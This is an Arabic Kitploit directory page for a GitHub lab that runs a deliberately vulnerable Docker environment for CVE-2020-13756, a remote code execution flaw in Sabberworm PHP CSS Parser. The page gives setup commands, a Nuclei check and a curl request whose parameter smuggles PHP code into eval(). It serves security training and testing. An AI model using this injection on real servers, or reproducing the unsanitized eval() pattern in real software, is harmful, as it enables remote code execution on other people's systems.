Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-13756-env — بيئة اختبار معرّضة للثغرات لـ CVE-2020-13756 (Sabberworm PHP CSS Parser RCE) | Kitploit
أدوات/GitHubGitHub/kre80r/cve-2020-13756-env
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubkre80r/cve-2020-13756-env

CVE-2020-13756-env

بيئة اختبار معرّضة للثغرات لـ CVE-2020-13756 (Sabberworm PHP CSS Parser RCE)

عرض المستودع
1منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

بيئة قابلة للاستغلال لـ CVE-2020-13756

بيئة اختبار قابلة للاستغلال لـ CVE-2020-13756 - تنفيذ التعليمات البرمجية عن بُعد في Sabberworm PHP CSS Parser.

تفاصيل الثغرة

الحقلالقيمة
CVECVE-2020-13756
المنتجSabberworm PHP CSS Parser
الإصدارات المتأثرة< 8.3.1
الخطورةحرجة (CVSS 9.8)
النوعتنفيذ التعليمات البرمجية عن بُعد

بدء سريع (سطر واحد)

root@kitploit:~
docker run -d -p 8080:80 $(docker build -q https://github.com/KrE80r/CVE-2020-13756-env.git)

أو استنسخ المشروع وشغّله:

root@kitploit:~
git clone https://github.com/KrE80r/CVE-2020-13756-env.git && cd CVE-2020-13756-env && docker-compose up -d

الإعداد اليدوي

root@kitploit:~
# Clone repository
git clone https://github.com/KrE80r/CVE-2020-13756-env.git
cd CVE-2020-13756-env

# Build and run
docker build -t sabberworm-vuln .
docker run -d -p 8080:80 sabberworm-vuln

التحقق من الثغرة

root@kitploit:~
# Test RCE - should print "VULN_TEST" in response
curl "http://localhost:8080/?n=100;printf(%22VULN_TEST%22);"

يجب أن يحتوي الإخراج المتوقع على VULN_TEST في البداية، مما يثبت تنفيذ التعليمات البرمجية.

الاختبار باستخدام Nuclei

root@kitploit:~
nuclei -t CVE-2020-13756.yaml -u http://localhost:8080 -debug

التفاصيل التقنية

توجد الثغرة في الدالة getSelectorsBySpecificity() التي تمرر مدخلات المستخدم غير المنقّاة إلى eval():

root@kitploit:~
// Vulnerable code path
$selectors = $doc->getSelectorsBySpecificity('> ' . $_GET['n']);
// When n=100;printf("test"); the eval() executes: eval('> 100;printf("test");')

المراجع

  • NVD
  • إصلاح الثغرة
  • الإفصاح الكامل
  • PacketStorm

إخلاء مسؤولية

هذه البيئة مخصّصة لاختبارات الأمان المصرَّح بها فقط. لا تستخدمها ضد الأنظمة دون إذن.

المؤلف

KrE80r - أبحاث أمنية

تنزيل الأداة